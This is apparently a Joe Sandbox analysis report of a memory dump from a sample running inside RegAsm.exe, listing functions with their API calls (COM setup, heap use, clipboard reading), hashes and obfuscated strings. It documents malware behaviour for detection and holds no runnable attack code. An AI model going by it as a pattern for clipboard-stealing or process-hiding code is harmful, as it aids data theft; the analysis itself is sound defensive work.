Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Non-executed Functions

Function 00411F90 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON

Download Yara Rule

Strings

r, xrefs: 0041332C
B, xrefs: 00412756
U, xrefs: 0041309F
0, xrefs: 00413AE2
X, xrefs: 004136A4
3, xrefs: 004126FE
7, xrefs: 0041271E
u, xrefs: 00412726
0, xrefs: 004134C4
7, xrefs: 00412E87
\, xrefs: 004136C4
f, xrefs: 0041349C
+, xrefs: 0041341C
<, xrefs: 004134A4
/, xrefs: 00412546
s, xrefs: 00412716
`, xrefs: 00412CC9
1, xrefs: 00412313
|, xrefs: 0041338C
Z, xrefs: 004136B4
j, xrefs: 0041340C
L, xrefs: 004133CC
T, xrefs: 00413704
F, xrefs: 00413694
5, xrefs: 0041270E
?, xrefs: 004133BC
>, xrefs: 00412424
(, xrefs: 0041376C
D, xrefs: 00413684
1, xrefs: 00412A88
x, xrefs: 0041333C
b, xrefs: 0041345C
<, xrefs: 0041209B
R, xrefs: 004136F4
[, xrefs: 004130CF
,, xrefs: 00412E8C
., xrefs: 004136FC
X, xrefs: 00412B60
`, xrefs: 00412B20
8, xrefs: 00413484
:, xrefs: 00413494
^, xrefs: 004136D4
q, xrefs: 0041335C
=, xrefs: 0041274E
o, xrefs: 0041342C
!, xrefs: 0041276E
4, xrefs: 004134E4
v, xrefs: 0041336C
g, xrefs: 00412B58
3, xrefs: 004134DC
@, xrefs: 00413664
@, xrefs: 00412A58
1, xrefs: 00412B18
;, xrefs: 0041273E
B, xrefs: 00413674
, xrefs: 00412766
{, xrefs: 0041331C
f, xrefs: 00412B50
v, xrefs: 004133DC
[, xrefs: 004134AC
9, xrefs: 0041272E
D, xrefs: 004138EA
W, xrefs: 004130AF
V, xrefs: 00413714
b, xrefs: 00412B30
_, xrefs: 004130EF
r, xrefs: 004133FC
P, xrefs: 004136E4
L, xrefs: 0041223A
Y, xrefs: 004130BF
?, xrefs: 0041275E
D, xrefs: 00413D5F
o, xrefs: 00411FF4
], xrefs: 004130DF
5, xrefs: 00412A68
2, xrefs: 004134D4
1, xrefs: 004136EC
N, xrefs: 00413654
J, xrefs: 00412736
?, xrefs: 0041223F
@, xrefs: 00412706
d, xrefs: 00412B40
>, xrefs: 004134B4

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
API String ID: 0-561599860
Opcode ID: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
Opcode Fuzzy Hash: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57

Function 00436E74 Relevance: 44.0, Strings: 35, Instructions: 286COMMON

Download Yara Rule

Strings

:, xrefs: 00436E9A
x, xrefs: 00436F56
V, xrefs: 00436F0E
1, xrefs: 00436ECA
\, xrefs: 00436EE6
X, xrefs: 00436ED6
q, xrefs: 00436EFA
., xrefs: 00436E92
B, xrefs: 00436F3E
=, xrefs: 00436EC2
5, xrefs: 00436ED2
F, xrefs: 00436F4E
L, xrefs: 00436F26
N, xrefs: 00436EAA
D, xrefs: 00436F46
~, xrefs: 00436F6E
H, xrefs: 00436F16
R, xrefs: 00436EFE
i, xrefs: 00436F1A
|, xrefs: 00436F66
p, xrefs: 00436F76
G, xrefs: 00436E82
z, xrefs: 00436F5E
\, xrefs: 00436F6A
-, xrefs: 00436E8A
^, xrefs: 00436EEE
J, xrefs: 00436F1E
N, xrefs: 00436F2E
@, xrefs: 00436F36
{, xrefs: 00436EE2
0, xrefs: 00436EB2
Z, xrefs: 00436EDE
P, xrefs: 00436EF6
4, xrefs: 00436EBA
T, xrefs: 00436F06

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
API String ID: 0-168325148
Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

U'g), xrefs: 004272F3
bweM, xrefs: 004276F0
FOEH, xrefs: 0042771E
+K!M, xrefs: 00427356
$&, xrefs: 004275AF
NO, xrefs: 00427361
>C7E, xrefs: 00427340
EG, xrefs: 0042740B
!, xrefs: 00427452
*W.Y, xrefs: 0042731F
UGBY, xrefs: 00427708
g#X%, xrefs: 004272E8
{7y9, xrefs: 004272C7
w?n!, xrefs: 004272DD
l+X-, xrefs: 004272FE
;[0], xrefs: 0042732A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423F20 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON

Download Yara Rule

Strings

6T, xrefs: 00424D0A
8JL, xrefs: 00424800
pIrK, xrefs: 00424560
)Z*\, xrefs: 00424828
A/6Q, xrefs: 004248E4
5F6X, xrefs: 00424C13
=_%A, xrefs: 0042490C
:JL, xrefs: 00424BF5
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
7, xrefs: 00424D00
?z=|, xrefs: 004247D8
-^+P, xrefs: 00424832
)Z/\, xrefs: 00424C1D
<[5], xrefs: 00424902
tv, xrefs: 00423F5A
9YB, xrefs: 004243DD, 00424413, 00425933
VaUc, xrefs: 0042459C
%y, xrefs: 00424D14
>N@, xrefs: 0042480A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
API String ID: 0-2608794092
Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84

Function 004241C0 Relevance: 26.0, Strings: 20, Instructions: 1025COMMON

Download Yara Rule

Strings

6T, xrefs: 00424D0A
8JL, xrefs: 00424800
pIrK, xrefs: 00424560
)Z*\, xrefs: 00424828
A/6Q, xrefs: 004248E4
$%, xrefs: 00424257
5F6X, xrefs: 00424C13
=_%A, xrefs: 0042490C
:JL, xrefs: 00424BF5
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
7, xrefs: 00424D00
?z=|, xrefs: 004247D8
-^+P, xrefs: 00424832
)Z/\, xrefs: 00424C1D
<[5], xrefs: 00424902
9YB, xrefs: 004243DD, 00424413, 00425933, 00425977
VaUc, xrefs: 0042459C
%y, xrefs: 00424D14
>N@, xrefs: 0042480A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-1300133108
Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84

Function 00424380 Relevance: 24.7, Strings: 19, Instructions: 948COMMON

Download Yara Rule

Strings

6T, xrefs: 00424D0A
8JL, xrefs: 00424800
pIrK, xrefs: 00424560
)Z*\, xrefs: 00424828
A/6Q, xrefs: 004248E4
5F6X, xrefs: 00424C13
=_%A, xrefs: 0042490C
:JL, xrefs: 00424BF5
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
7, xrefs: 00424D00
?z=|, xrefs: 004247D8
-^+P, xrefs: 00424832
)Z/\, xrefs: 00424C1D
<[5], xrefs: 00424902
9YB, xrefs: 004243DD, 00424413, 00425933
VaUc, xrefs: 0042459C
%y, xrefs: 00424D14
>N@, xrefs: 0042480A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-1893782281
Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84

Function 004091B0 Relevance: 15.4, Strings: 12, Instructions: 368COMMON

Download Yara Rule

Strings

gn~b, xrefs: 0040927C
bblg, xrefs: 0040928C
w!w4, xrefs: 004091F1
O35 , xrefs: 00409240
>7;<, xrefs: 004091F9
(7.A, xrefs: 004092DC
$01;, xrefs: 004091E1
ne, xrefs: 00409209
!+2j, xrefs: 004091C9
vm/;, xrefs: 004091D9
908#, xrefs: 004091E9
", xrefs: 0040931D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
API String ID: 0-1290103930
Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

0u4w, xrefs: 0041D236
_q, xrefs: 0041D1C5
p8`;, xrefs: 0041CDBD
Q, xrefs: 0041CF39
qr, xrefs: 0041D063
KT, xrefs: 0041CF31
xy, xrefs: 0041D23E
SV, xrefs: 0041CF29

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 00419F30 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

/ , xrefs: 0041A402
/,-, xrefs: 0041A991
46, xrefs: 0041A3EA

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$46
API String ID: 764372645-479303636
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 0040A780 Relevance: 9.2, Strings: 7, Instructions: 442COMMON

Download Yara Rule

Strings

Q?S, xrefs: 0040A8A0
E)G, xrefs: 0040A888
}JsE, xrefs: 0040AA24, 0040AB73, 0040AB83, 0040AC6C, 0040A9D0, 0040ABE0, 0040AC63
}JsE, xrefs: 0040AA60, 0040ACD9
1]_, xrefs: 0040A8B8
:;, xrefs: 0040A954
AC, xrefs: 0040A880

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
API String ID: 0-2463461626
Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87

Function 0040ACF0 Relevance: 9.2, Strings: 7, Instructions: 430COMMON

Download Yara Rule

Strings

&K M, xrefs: 0040ADBF
&wXy, xrefs: 0040ADD4
h? !, xrefs: 0040AFB3
e7o9, xrefs: 0040AF9F
'sZu, xrefs: 0040ADCD
Jk"m, xrefs: 0040ADF7
/O_q, xrefs: 0040ADC6

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
API String ID: 0-2986092683
Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

jqci, xrefs: 0040901D
(, xrefs: 00409065
|$Nb, xrefs: 00409025
ye{|, xrefs: 00409035
x|j~, xrefs: 0040904D
wkw6, xrefs: 00409045
z/6q, xrefs: 0040903D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 00427603 Relevance: 7.0, Strings: 5, Instructions: 702COMMON

Download Yara Rule

Strings

)G+I, xrefs: 00427880
+K M, xrefs: 00427888
B~B, xrefs: 00427DD2
|B, xrefs: 00427CB6
s0u, xrefs: 00427898

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )G+I$+K M$B~B$|B$s0u
API String ID: 0-2670551875
Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

,, xrefs: 004183A1
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
